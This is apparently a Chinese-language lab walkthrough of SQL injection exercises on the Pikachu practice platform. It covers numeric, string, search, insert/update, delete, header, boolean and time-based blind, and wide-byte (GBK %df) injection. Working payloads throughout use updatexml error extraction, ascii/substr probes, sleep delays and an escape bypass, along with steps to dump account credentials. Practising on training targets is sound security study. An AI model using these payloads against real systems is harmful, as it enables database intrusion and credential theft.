一、数字型注入
1.先输入一下看看
2.直接抓包,在编号后面加真命题
成功注入爆数据库
二、字符型注入
1.加单引号报错,说明存在注入
2.加上真命题爆出all
三、搜索型注入
1.加单引号报错,直接加真命题
lucy' or 1=1 #
四、xx型注入
1.先试了试a',发现没有反应,后来在提示里看见了一个反括号,于是加了一个反括号
发现有回显
于是利用联合查询,order为2
2.爆出数据库名字
3.通过数据库名爆出users,从users中爆出账户和密码
五、insertupdate注入
1.1.insert注入
测试模块:注册处
令用户名为a’
Payload:
a' or updatexml(1,concat(0x7e,database()),0) or'
爆出数据库名
2.update注入
先登录进去,然后在修改资料处填写信息抓包
Payload:
a' or updatexml(1,concat(0x7e,database()),0) or'
成功
六、delete注入
1.先留言,点击删除时抓包
2.修改payload
成功
七、http header注入
1.抓包,对UA头修改
将payload构造
1' or updatexml (1,concat(0x7e,datebase()),0) or '
八、盲注(base on boolian)
1.只有输入kobe' and 1=1 # 才有反应
2.利用and构造
kobe' and ascii(substr(database(),1,1))=112#
九、盲注(base on time)
1.kobe' and if ((substr(database(),1,1))='a',sleep=(5),null)#
急速返回,说明首字母不是a
根据时间的延迟来做判断
用 if 做判断,通过 database 把数据库名称取出来,通过 substr 把数据库第一个字符取出来,和 p 作比较,如果等于p 则暂停5秒钟。
暂定了五秒才输出结果
十、宽字节注入
当我们输入有单引号时被转义为’,无法构造 SQL 语句的时候,可以尝试宽字节注入。
GBK编码中,反斜杠的编码是 “%5c”,而 “%df%5c” 是繁体字 “連”。
在皮卡丘平台中,将利用 BurpSuite 截获数据包,发送到 Repeater 中,在里面写入 payload
当我们用通常的测试 payload时,是无法执行成功的
因为在后台单引号会被转义,在数据库中执行时多了个反斜杠。我们可以用下面的payload,在单引号前面加上 %df,让单引号成功逃逸
kobe%df' or 1=1#